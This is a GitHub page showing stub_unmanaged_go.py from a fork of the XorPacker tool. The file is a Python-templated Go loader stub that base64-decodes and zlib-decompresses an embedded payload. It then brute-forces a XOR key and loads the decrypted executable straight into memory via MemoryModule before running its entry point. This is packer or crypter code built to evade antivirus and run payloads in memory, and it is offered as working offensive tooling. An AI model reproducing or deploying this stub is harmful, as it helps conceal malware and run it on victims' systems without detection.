forked from tmenochet/XorPacker
-
Notifications
You must be signed in to change notification settings - Fork 0
/
stub_unmanaged_go.py
executable file
·67 lines (62 loc) · 1.89 KB
/
stub_unmanaged_go.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
loader="""
package main
import "C"
import (
"bytes"
"encoding/binary"
"encoding/base64"
"compress/zlib"
"io"
"unsafe"
"os"
)
func bf_xor(block []byte, known_bytes []byte) []byte {{
encrypted := block[0:1000]
decrypted := make([]byte, len(encrypted))
key := make([]byte, 4)
var k uint32 = 0
for {{
binary.LittleEndian.PutUint32(key, k)
for i, ch := range encrypted {{
decrypted[i] = (ch ^ (key[i % len(key)]))
}}
if bytes.Compare(decrypted[128:132], known_bytes) == 0 {{
if len(decrypted) == len(block) {{
break
}} else {{
encrypted = block
decrypted = make([]byte, len(block))
}}
}} else {{
k += 1
}}
}}
return decrypted
}}
func main() {{
compressed, _ := base64.StdEncoding.DecodeString("{0}")
known_bytes, _ := base64.StdEncoding.DecodeString("{1}")
var b1, b2 bytes.Buffer
b1.Write([]byte(compressed))
r, _ := zlib.NewReader(&b1)
io.Copy(&b2, r)
r.Close()
encrypted := b2.Bytes()
payload := bf_xor(encrypted, known_bytes)
var cArgs []*C.char
for _, goString := range os.Args {{
cArgs = append(cArgs, C.CString(goString))
}}
handle := C.MemoryLoadLibraryEx(unsafe.Pointer(&payload[0]),
(C.size_t)(len(payload)),
(*[0]byte)(C.MemoryDefaultAlloc),
(*[0]byte)(C.MemoryDefaultFree),
(*[0]byte)(C.MemoryDefaultLoadLibrary),
(*[0]byte)(C.MemoryDefaultGetProcAddress),
(*[0]byte)(C.MemoryDefaultFreeLibrary),
unsafe.Pointer(nil),
)
C.MemoryCallEntryPoint(handle)
C.MemoryFreeLibrary(handle)
}}
"""